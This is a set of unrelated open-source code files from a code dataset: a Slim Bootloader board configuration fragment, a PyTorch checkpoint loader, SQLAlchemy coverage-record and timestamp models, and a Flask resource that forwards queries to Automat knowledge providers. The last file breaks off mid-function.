# the ImageId field in the VBT container.
# VbtFileName is the VBT file name. It needs to be located under platform
# VbtBin folder.
self._MULTI_VBT_FILE = {1:'Vbt.dat', 2:'Vbt_Up2.dat'}
def GetPlatformDsc (self):
dsc = {}
common_libs = [
'LoaderLib|Platform/$(BOARD_PKG_NAME)/Library/LoaderLib/LoaderLib.inf',
'SerialPortLib|Silicon/$(SILICON_PKG_NAME)/Library/SerialPortLib/SerialPortLib.inf',
'SocInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/SocInfoLib/SocInfoLib.inf',
'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf',
'ScSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/ScSbiAccessLib/ScSbiAccessLib.inf',
'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf',
'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf',
'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf',
'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf',
'IocIpcLib|Platform/$(BOARD_PKG_NAME)/Library/IocIpcLib/IocIpcLib.inf',
'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib20/BootGuardLib20.inf',
'HeciLib|Silicon/ApollolakePkg/Library/HeciLib/HeciLib.inf',
'PsdLib|Silicon/ApollolakePkg/Library/PsdLib/PsdLib.inf',
'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf',
'BootMediaLib|Silicon/ApollolakePkg/Library/BootMediaLib/BootMediaLib.inf',
'FlashDescriptorLib|Silicon/ApollolakePkg/Library/FlashDescriptorLib/FlashDescriptorLib.inf',
'VtdLib|Silicon/$(SILICON_PKG_NAME)/Library/VtdLib/VtdLib.inf',
'SmbusLib|Silicon/$(SILICON_PKG_NAME)/Library/SmbusLib/SmbusLib.inf',
'HdaLib|Platform/$(BOARD_PKG_NAME)/Library/HdaLib/HdaLib.inf',
'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf',
'BaseIpcLib|Silicon/$(SILICON_PKG_NAME)/Library/BaseIpcLib/BaseIpcLib.inf'
]
dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs
return dsc
def GetFlashMapList (self):
img_list = self.GetImageLayout ()
comp_list = []
offset = 0
# Skip Stitch_IPAD and Stitch_OPAD for flash map
for img in img_list[2:][::-1]:
child = img[1][0]
if child[3] & STITCH_OPS.MODE_FILE_IGNOR:
continue
bname = os.path.splitext(child[0])[0]
comp = {'name':child[0], 'bname':bname, 'offset':offset, 'size':child[2], 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['COMPRESSED'] if child[1] else 0}
if bname in ['STAGE1A', 'STAGE1B', 'STAGE2', 'FWUPDATE', 'CFGDATA', 'MRCDATA', 'PAYLOAD', 'VARIABLE']:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
else:
comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']
comp_list.append (comp)
offset += child[2]
flag = FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']
comp_list.append ({'name':'SBLRSVD.bin','bname':'SBLRSVD','offset':0, 'size':self.SBLRSVD_SIZE, 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']})
comp_list.append ({'name':'BPM.bin', 'bname':'BPM', 'offset':0, 'size':0, 'flag': flag})
return comp_list[::-1]
def GetOutputImages (self):
# define extra images that will be copied to output folder
img_list = ['SlimBootloader.txt',
'CfgDataStitch.py',
'CfgDataDef.yaml',
'CfgDataInt.bin'
]
return img_list
def GetKeyHashList (self):
# Define a set of new key used for different purposes
# The key is either key id or public key PEM format or private key PEM format
pub_key_list = [
(
# Key for verifying Config data blob
HASH_USAGE['PUBKEY_CFG_DATA'],
'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying firmware update
HASH_USAGE['PUBKEY_FWU'],
'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE
),
(
# Key for verifying container header
HASH_USAGE['PUBKEY_CONT_DEF'],
'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE
),
(
# key for veryfying OS image.
HASH_USAGE['PUBKEY_OS'],
'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE
),
]
return pub_key_list
def GetImageLayout (self):
ias1_flag = 0 if self.SPI_IAS1_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR
fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR
img_list = []
img_list.extend ([
# Padding to ensure all other components in OBB partition will be aligned at 4KB boundary
# 0xB00 assumes (IBBP.man, BPM.met) + (IPAD, IBBL, IBBM, OBB, FWUP, CFGD, PLD, VAR, MRCD) in BpdtIBB
# 0x180 assumes (OPAD, PROV, EPLD) in BpdtOBB
# If more files are added, the offset needs to be adjusted accordingly
('Stitch_IPAD.bin', [
('PADDING.bin', '', 0xB00, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OPAD.bin', [
('PADDING.bin', '', 0x180, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FWU.bin', [
('FWUPDATE.bin' , 'Lzma', self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FB.bin', [
('SPI_IAS1.bin', '', self.SPI_IAS1_SIZE, STITCH_OPS.MODE_FILE_PAD | ias1_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_PLD.bin', [
('PAYLOAD.bin', 'Lz4', self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_VAR.bin', [
('VARIABLE.bin', '', self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_MRCDATA.bin', [
('MRCDATA.bin', '', self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_CFGDATA.bin', [
('CFGDATA.bin', '', self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_KEYHASH.bin', [
('KEYHASH.bin', '', self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OBB.bin', [
('STAGE2.fd', 'Lz4', self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBM.bin', [
('STAGE1B.fd', 'Lz4', self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBL.bin', [
('STAGE1A.fd', '', self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_EPLD.bin', [
('EPAYLOAD.bin', '', self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_UVAR.bin', [
('UEFIVARIABLE.bin', '', self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)],
),
])
return img_list
|
the-stack_0_6263 | import torch
import os
from collections import OrderedDict
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
def load_checkpoint(model, checkpoint_path):
if checkpoint_path and os.path.isfile(checkpoint_path):
print("=> Loading checkpoint '{}'".format(checkpoint_path))
checkpoint = torch.load(checkpoint_path)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint['state_dict'].items():
if k.startswith('module'):
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
else:
model.load_state_dict(checkpoint)
print("=> Loaded checkpoint '{}'".format(checkpoint_path))
else:
print("=> Error: No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, url, filter_fn=None, strict=True):
state_dict = load_state_dict_from_url(url, progress=False, map_location='cpu')
input_conv = 'conv_stem'
classifier = 'classifier'
in_chans = getattr(model, input_conv).weight.shape[1]
num_classes = getattr(model, classifier).weight.shape[0]
input_conv_weight = input_conv + '.weight'
pretrained_in_chans = state_dict[input_conv_weight].shape[1]
if in_chans != pretrained_in_chans:
if in_chans == 1:
print('=> Converting pretrained input conv {} from {} to 1 channel'.format(
input_conv_weight, pretrained_in_chans))
conv1_weight = state_dict[input_conv_weight]
state_dict[input_conv_weight] = conv1_weight.sum(dim=1, keepdim=True)
else:
print('=> Discarding pretrained input conv {} since input channel count != {}'.format(
input_conv_weight, pretrained_in_chans))
del state_dict[input_conv_weight]
strict = False
classifier_weight = classifier + '.weight'
pretrained_num_classes = state_dict[classifier_weight].shape[0]
if num_classes != pretrained_num_classes:
print('=> Discarding pretrained classifier since num_classes != {}'.format(pretrained_num_classes))
del state_dict[classifier_weight]
del state_dict[classifier + '.bias']
strict = False
if filter_fn is not None:
state_dict = filter_fn(state_dict)
model.load_state_dict(state_dict, strict=strict)
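# Usage sketch -- the model builder, URL and checkpoint path below are
# placeholders, and load_pretrained() assumes an EfficientNet-style model
# exposing 'conv_stem' and 'classifier' attributes:
#   model = build_model()
#   load_pretrained(model, 'https://example.com/weights.pth', strict=False)
#   load_checkpoint(model, 'checkpoints/model_best.pth.tar')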
|
the-stack_0_6264 | # encoding: utf-8
# BaseCoverageRecord, Timestamp, CoverageRecord, WorkCoverageRecord
from . import (
Base,
get_one,
get_one_or_create,
)
import datetime
from sqlalchemy import (
Column,
DateTime,
Enum,
ForeignKey,
Index,
Integer,
String,
Unicode,
UniqueConstraint,
)
from sqlalchemy.orm.session import Session
from sqlalchemy.sql.expression import (
and_,
or_,
literal,
literal_column,
)
class BaseCoverageRecord(object):
"""Contains useful constants used by both CoverageRecord and
WorkCoverageRecord.
"""
SUCCESS = u'success'
TRANSIENT_FAILURE = u'transient failure'
PERSISTENT_FAILURE = u'persistent failure'
REGISTERED = u'registered'
ALL_STATUSES = [REGISTERED, SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# Count coverage as attempted if the record is not 'registered'.
PREVIOUSLY_ATTEMPTED = [SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# By default, count coverage as present if it ended in
# success or in persistent failure. Do not count coverage
# as present if it ended in transient failure.
DEFAULT_COUNT_AS_COVERED = [SUCCESS, PERSISTENT_FAILURE]
status_enum = Enum(SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE,
REGISTERED, name='coverage_status')
@classmethod
def not_covered(cls, count_as_covered=None,
count_as_not_covered_if_covered_before=None):
"""Filter a query to find only items without coverage records.
:param count_as_covered: A list of constants that indicate
types of coverage records that should count as 'coverage'
for purposes of this query.
:param count_as_not_covered_if_covered_before: If a coverage record
exists, but is older than the given date, do not count it as
covered.
:return: A clause that can be passed in to Query.filter().
"""
if not count_as_covered:
count_as_covered = cls.DEFAULT_COUNT_AS_COVERED
elif isinstance(count_as_covered, basestring):
count_as_covered = [count_as_covered]
# If there is no coverage record, then of course the item is
# not covered.
missing = cls.id==None
# If we're looking for specific coverage statuses, then a
# record does not count if it has some other status.
missing = or_(
missing, ~cls.status.in_(count_as_covered)
)
# If the record's timestamp is before the cutoff time, we
# don't count it as covered, regardless of which status it
# has.
if count_as_not_covered_if_covered_before:
missing = or_(
missing, cls.timestamp < count_as_not_covered_if_covered_before
)
return missing
class Timestamp(Base):
"""Tracks the activities of Monitors, CoverageProviders,
and general scripts.
"""
__tablename__ = 'timestamps'
MONITOR_TYPE = "monitor"
COVERAGE_PROVIDER_TYPE = "coverage_provider"
SCRIPT_TYPE = "script"
# A stand-in value used to indicate that a field in the timestamps
# table should be explicitly set to None. Passing in None for most
# fields will use default values.
CLEAR_VALUE = object()
service_type_enum = Enum(
MONITOR_TYPE, COVERAGE_PROVIDER_TYPE, SCRIPT_TYPE,
name="service_type",
)
# Unique ID
id = Column(Integer, primary_key=True)
# Name of the service.
service = Column(String(255), index=True, nullable=False)
# Type of the service -- monitor, coverage provider, or script.
# If the service type does not fit into these categories, this field
# can be left null.
service_type = Column(service_type_enum, index=True, default=None)
# The collection, if any, associated with this service -- some services
# run separately on a number of collections.
collection_id = Column(Integer, ForeignKey('collections.id'),
index=True, nullable=True)
# The last time the service _started_ running.
start = Column(DateTime, nullable=True)
# The last time the service _finished_ running. In most cases this
# is the 'timestamp' proper.
finish = Column(DateTime)
# A description of the things the service achieved during its last
# run. Each service may decide for itself what counts as an
# 'achievement'; this is just a way to distinguish services that
# do a lot of things from services that do a few things, or to see
# services that run to completion but don't actually do anything.
achievements = Column(Unicode, nullable=True)
# This column allows a service to keep one item of state between
# runs. For example, a monitor that iterates over a database table
# needs to keep track of the last database ID it processed.
counter = Column(Integer, nullable=True)
# The exception, if any, that stopped the service from running
# during its previous run.
exception = Column(Unicode, nullable=True)
def __repr__(self):
format = '%b %d, %Y at %H:%M'
if self.finish:
finish = self.finish.strftime(format)
else:
finish = None
if self.start:
start = self.start.strftime(format)
else:
start = None
if self.collection:
collection = self.collection.name
else:
collection = None
message = u"<Timestamp %s: collection=%s, start=%s finish=%s counter=%s>" % (
self.service, collection, start, finish, self.counter
)
return message
@classmethod
def lookup(cls, _db, service, service_type, collection):
return get_one(
_db, Timestamp, service=service, service_type=service_type,
collection=collection
)
@classmethod
def value(cls, _db, service, service_type, collection):
"""Return the current value of the given Timestamp, if it exists.
"""
stamp = cls.lookup(_db, service, service_type, collection)
if not stamp:
return None
return stamp.finish
@classmethod
def stamp(
cls, _db, service, service_type, collection=None, start=None,
finish=None, achievements=None, counter=None, exception=None
):
"""Set a Timestamp, creating it if necessary.
This should be called once a service has stopped running,
whether or not it was able to complete its task.
:param _db: A database connection.
:param service: The name of the service associated with the Timestamp.
:param service_type: The type of the service associated with
the Timestamp. This must be one of the values in
            Timestamp.service_type_enum.
:param collection: The Collection, if any, on which this service
just ran.
:param start: The time at which this service started running.
Defaults to now.
:param finish: The time at which this service stopped running.
Defaults to now.
:param achievements: A human-readable description of what the service
did during its run.
:param counter: An integer item of state that the service may use
to track its progress between runs.
:param exception: A stack trace for the exception, if any, which
stopped the service from running.
"""
if start is None and finish is None:
start = finish = datetime.datetime.utcnow()
elif start is None:
start = finish
elif finish is None:
finish = start
stamp, was_new = get_one_or_create(
_db, Timestamp,
service=service,
service_type=service_type,
collection=collection,
)
stamp.update(start, finish, achievements, counter, exception)
# Committing immediately reduces the risk of contention.
_db.commit()
return stamp
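    # Usage sketch (service name and achievements text are illustrative):
    #   Timestamp.stamp(_db, "My Monitor", Timestamp.MONITOR_TYPE,
    #                   collection=collection, achievements="10 items processed")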
def update(self, start=None, finish=None, achievements=None,
counter=None, exception=None):
"""Use a single method to update all the fields that aren't
used to identify a Timestamp.
"""
if start is not None:
if start is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.start, but this can be overridden.
start = None
self.start = start
if finish is not None:
if finish is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.finish, but this can be overridden.
finish = None
self.finish = finish
if achievements is not None:
if achievements is self.CLEAR_VALUE:
achievements = None
self.achievements = achievements
if counter is not None:
if counter is self.CLEAR_VALUE:
counter = None
self.counter = counter
# Unlike the other fields, None is the default value for
# .exception, so passing in None to mean "use the default" and
# None to mean "no exception" mean the same thing. But we'll
# support CLEAR_VALUE anyway.
if exception is self.CLEAR_VALUE:
exception = None
self.exception = exception
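    # Hedged example of the CLEAR_VALUE sentinel (CLEAR_VALUE is assumed to be
    # the class-level sentinel object defined earlier on Timestamp): passing
    # it explicitly blanks a field, whereas passing None leaves it untouched.
    #
    #     stamp.update(start=Timestamp.CLEAR_VALUE)  # sets stamp.start = None
    #     stamp.update(start=None)                   # leaves stamp.start as-is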
def to_data(self):
"""Convert this Timestamp to an unfinalized TimestampData."""
from ..metadata_layer import TimestampData
return TimestampData(
start=self.start, finish=self.finish,
achievements=self.achievements, counter=self.counter
)
__table_args__ = (
UniqueConstraint('service', 'collection_id'),
)
class CoverageRecord(Base, BaseCoverageRecord):
"""A record of a Identifier being used as input into some process."""
__tablename__ = 'coveragerecords'
SET_EDITION_METADATA_OPERATION = u'set-edition-metadata'
CHOOSE_COVER_OPERATION = u'choose-cover'
REAP_OPERATION = u'reap'
IMPORT_OPERATION = u'import'
RESOLVE_IDENTIFIER_OPERATION = u'resolve-identifier'
REPAIR_SORT_NAME_OPERATION = u'repair-sort-name'
METADATA_UPLOAD_OPERATION = u'metadata-upload'
id = Column(Integer, primary_key=True)
identifier_id = Column(
Integer, ForeignKey('identifiers.id'), index=True)
# If applicable, this is the ID of the data source that took the
# Identifier as input.
data_source_id = Column(
Integer, ForeignKey('datasources.id')
)
operation = Column(String(255), default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
# If applicable, this is the ID of the collection for which
# coverage has taken place. This is currently only applicable
# for Metadata Wrangler coverage.
collection_id = Column(
Integer, ForeignKey('collections.id'), nullable=True
)
__table_args__ = (
Index(
'ix_identifier_id_data_source_id_operation',
identifier_id, data_source_id, operation,
unique=True, postgresql_where=collection_id.is_(None)),
Index(
'ix_identifier_id_data_source_id_operation_collection_id',
identifier_id, data_source_id, operation, collection_id,
unique=True
),
)
def __repr__(self):
template = '<CoverageRecord: %(timestamp)s identifier=%(identifier_type)s/%(identifier)s data_source="%(data_source)s"%(operation)s status="%(status)s" %(exception)s>'
return self.human_readable(template)
def human_readable(self, template):
"""Interpolate data into a human-readable template."""
if self.operation:
operation = ' operation="%s"' % self.operation
else:
operation = ''
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
return template % dict(
timestamp=self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
identifier_type=self.identifier.type,
identifier=self.identifier.identifier,
data_source=self.data_source.name,
operation=operation,
status=self.status,
exception=exception,
)
@classmethod
def lookup(cls, edition_or_identifier, data_source, operation=None,
collection=None):
from datasource import DataSource
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition_or_identifier)
if isinstance(edition_or_identifier, Identifier):
identifier = edition_or_identifier
elif isinstance(edition_or_identifier, Edition):
identifier = edition_or_identifier.primary_identifier
else:
raise ValueError(
"Cannot look up a coverage record for %r." % edition)
if isinstance(data_source, basestring):
data_source = DataSource.lookup(_db, data_source)
return get_one(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, edition, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, collection=None):
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition)
if isinstance(edition, Identifier):
identifier = edition
elif isinstance(edition, Edition):
identifier = edition.primary_identifier
else:
raise ValueError(
"Cannot create a coverage record for %r." % edition)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
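    # Hedged usage sketch (the data source name is illustrative, not taken
    # from this file):
    #
    #     source = DataSource.lookup(_db, "My Data Source")
    #     record, is_new = CoverageRecord.add_for(
    #         edition, source, operation=CoverageRecord.IMPORT_OPERATION
    #     )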
@classmethod
def bulk_add(cls, identifiers, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, exception=None, collection=None,
force=False,
):
"""Create and update CoverageRecords so that every Identifier in
`identifiers` has an identical record.
"""
from identifier import Identifier
if not identifiers:
# Nothing to do.
return
_db = Session.object_session(identifiers[0])
timestamp = timestamp or datetime.datetime.utcnow()
identifier_ids = [i.id for i in identifiers]
equivalent_record = and_(
cls.operation==operation,
cls.data_source==data_source,
cls.collection==collection,
)
updated_or_created_results = list()
if force:
            # Make sure that identifiers that previously had a
            # CoverageRecord for this operation have their timestamp
            # and status updated.
update = cls.__table__.update().where(and_(
cls.identifier_id.in_(identifier_ids),
equivalent_record,
)).values(
dict(timestamp=timestamp, status=status, exception=exception)
).returning(cls.id, cls.identifier_id)
updated_or_created_results = _db.execute(update).fetchall()
already_covered = _db.query(cls.id, cls.identifier_id).filter(
equivalent_record,
cls.identifier_id.in_(identifier_ids),
).subquery()
# Make sure that any identifiers that need a CoverageRecord get one.
# The SELECT part of the INSERT...SELECT query.
data_source_id = data_source.id
collection_id = None
if collection:
collection_id = collection.id
new_records = _db.query(
Identifier.id.label('identifier_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status'),
literal(exception, type_=Unicode).label('exception'),
literal(data_source_id, type_=Integer).label('data_source_id'),
literal(collection_id, type_=Integer).label('collection_id'),
).select_from(Identifier).outerjoin(
already_covered, Identifier.id==already_covered.c.identifier_id,
).filter(already_covered.c.id==None)
new_records = new_records.filter(Identifier.id.in_(identifier_ids))
# The INSERT part.
insert = cls.__table__.insert().from_select(
[
literal_column('identifier_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
literal_column('exception'),
literal_column('data_source_id'),
literal_column('collection_id'),
],
new_records
).returning(cls.id, cls.identifier_id)
inserts = _db.execute(insert).fetchall()
updated_or_created_results.extend(inserts)
_db.commit()
# Default return for the case when all of the identifiers were
# ignored.
new_records = list()
ignored_identifiers = identifiers
new_and_updated_record_ids = [r[0] for r in updated_or_created_results]
impacted_identifier_ids = [r[1] for r in updated_or_created_results]
if new_and_updated_record_ids:
new_records = _db.query(cls).filter(cls.id.in_(
new_and_updated_record_ids
)).all()
ignored_identifiers = filter(
lambda i: i.id not in impacted_identifier_ids, identifiers
)
return new_records, ignored_identifiers
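    # Hedged usage sketch: mark a batch of identifiers as successfully covered
    # in a single round trip (variable names are illustrative).
    #
    #     records, ignored = CoverageRecord.bulk_add(
    #         identifiers, data_source,
    #         operation=CoverageRecord.IMPORT_OPERATION,
    #     )
    #
    # `ignored` holds identifiers that already had an equivalent record and
    # were left untouched (unless force=True was passed).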
Index("ix_coveragerecords_data_source_id_operation_identifier_id", CoverageRecord.data_source_id, CoverageRecord.operation, CoverageRecord.identifier_id)
class WorkCoverageRecord(Base, BaseCoverageRecord):
"""A record of some operation that was performed on a Work.
This is similar to CoverageRecord, which operates on Identifiers,
but since Work identifiers have no meaning outside of the database,
we presume that all the operations involve internal work only,
and as such there is no data_source_id.
"""
__tablename__ = 'workcoveragerecords'
CHOOSE_EDITION_OPERATION = u'choose-edition'
CLASSIFY_OPERATION = u'classify'
SUMMARY_OPERATION = u'summary'
QUALITY_OPERATION = u'quality'
GENERATE_OPDS_OPERATION = u'generate-opds'
GENERATE_MARC_OPERATION = u'generate-marc'
UPDATE_SEARCH_INDEX_OPERATION = u'update-search-index'
id = Column(Integer, primary_key=True)
work_id = Column(Integer, ForeignKey('works.id'), index=True)
operation = Column(String(255), index=True, default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
__table_args__ = (
UniqueConstraint('work_id', 'operation'),
)
def __repr__(self):
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
template = '<WorkCoverageRecord: work_id=%s operation="%s" timestamp="%s"%s>'
return template % (
self.work_id, self.operation,
self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
exception
)
@classmethod
def lookup(self, work, operation):
_db = Session.object_session(work)
return get_one(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, work, operation, timestamp=None,
status=CoverageRecord.SUCCESS):
_db = Session.object_session(work)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(self, works, operation, timestamp=None,
status=CoverageRecord.SUCCESS, exception=None):
"""Create and update WorkCoverageRecords so that every Work in
`works` has an identical record.
"""
from work import Work
if not works:
# Nothing to do.
return
_db = Session.object_session(works[0])
timestamp = timestamp or datetime.datetime.utcnow()
work_ids = [w.id for w in works]
# Make sure that works that previously had a
# WorkCoverageRecord for this operation have their timestamp
# and status updated.
update = WorkCoverageRecord.__table__.update().where(
and_(WorkCoverageRecord.work_id.in_(work_ids),
WorkCoverageRecord.operation==operation)
).values(dict(timestamp=timestamp, status=status, exception=exception))
_db.execute(update)
# Make sure that any works that are missing a
# WorkCoverageRecord for this operation get one.
# Works that already have a WorkCoverageRecord will be ignored
# by the INSERT but handled by the UPDATE.
already_covered = _db.query(WorkCoverageRecord.work_id).select_from(
WorkCoverageRecord).filter(
WorkCoverageRecord.work_id.in_(work_ids)
).filter(
WorkCoverageRecord.operation==operation
)
# The SELECT part of the INSERT...SELECT query.
new_records = _db.query(
Work.id.label('work_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status')
).select_from(
Work
)
new_records = new_records.filter(
Work.id.in_(work_ids)
).filter(
~Work.id.in_(already_covered)
)
# The INSERT part.
insert = WorkCoverageRecord.__table__.insert().from_select(
[
literal_column('work_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
],
new_records
)
_db.execute(insert)
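    # Note: unlike CoverageRecord.bulk_add, this method neither commits nor
    # returns the new or updated records; callers that need them must query
    # WorkCoverageRecord afterwards.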
Index("ix_workcoveragerecords_operation_work_id", WorkCoverageRecord.operation, WorkCoverageRecord.work_id)
|
the-stack_0_6265 | import copy
import json
import requests
from flask import request
from tranql.backplane.api.standard_api import StandardAPIResource
from tranql.config import config
#######################################################
##
# Automat - query Automat-KPs.
##
#######################################################
class AutomatResource(StandardAPIResource):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.url = config.get("AUTOMAT_URL")
def get_kp_reasoner_api(self, kp_tag):
return f'{self.url}/{kp_tag}/query'
def get_kp_schema_api(self, kp_tag):
return f'{self.url}/{kp_tag}/predicates'
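    # For example, with AUTOMAT_URL set to "https://automat.example.org" (an
    # illustrative value), get_kp_reasoner_api("uberon") returns
    # "https://automat.example.org/uberon/query" and get_kp_schema_api("uberon")
    # returns "https://automat.example.org/uberon/predicates".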
class AutomatSchema(AutomatResource):
def get(self, kp_tag):
"""
Automat Schema
---
tags: [schema]
        description: Query the schema of a KP in Automat.
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
responses:
'200':
description: Schema
content:
application/json:
schema:
type: object
example:
population_of_individual_organisms:
phenotypic_feature:
- association
named_thing:
- association
activity_and_behavior:
- association
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'"""
url = self.get_kp_schema_api(kp_tag)
response = requests.get(url)
if response.status_code != 200 :
result = {
"status": "error",
"code": "service_invocation_error",
"message": f"Bad Automat response. When getting schema. url: {self.url} \n request: {json.dumps(request.json, indent=2)} "
f"response: \n{response.text}."
}
return result, 500
else:
return response.json()
class AutomatQuery(AutomatResource):
""" Generic graph query to Gamma. """
def post(self, kp_tag):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
requestBody:
description: Input message
required: true
content:
application/json:
schema:
$ref: '#/definitions/Message'
example:
knowledge_graph:
nodes: []
edges: []
knowledge_maps:
- {}
question_graph:
nodes:
- id: "chemical_substance"
type: "chemical_substance"
curie: "CHEMBL:CHEMBL3"
- id: "disease"
type: "disease"
edges:
- id: "e1"
source_id: "chemical_substance"
target_id: "disease"
options: {}
responses:
'200':
description: Message
content:
application/json:
schema:
$ref: '#/definitions/Message'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
self.validate (request, 'Message')
url = self.get_kp_reasoner_api(kp_tag)
# question_graph should be query graph
question = request.json
question['query_graph'] = copy.deepcopy(question['question_graph'])
del question['question_graph']
del question['knowledge_graph']
del question['knowledge_maps']
response = requests.post(url, json={"message": question})
if response.status_code >= 300:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
else:
result = self.down_cast_message(response.json())
return self.response(result)
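        # In short: the incoming message's `question_graph` is renamed to
        # `query_graph`, `knowledge_graph` and `knowledge_maps` are dropped,
        # and the result is POSTed to Automat wrapped as {"message": {...}}.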
class AutomatRegistry(AutomatResource):
def get(self):
"""
        Automat registry
---
tags: [query]
        description: List the knowledge providers (KPs) registered with Automat.
responses:
'200':
description: Message
content:
application/json:
schema:
- 'intact'
- 'ctd'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
response = requests.get(self.url + '/registry')
if response.status_code == 200:
return response.json()
else:
result = {
"status": "error",
"code": "service_invocation_failure",
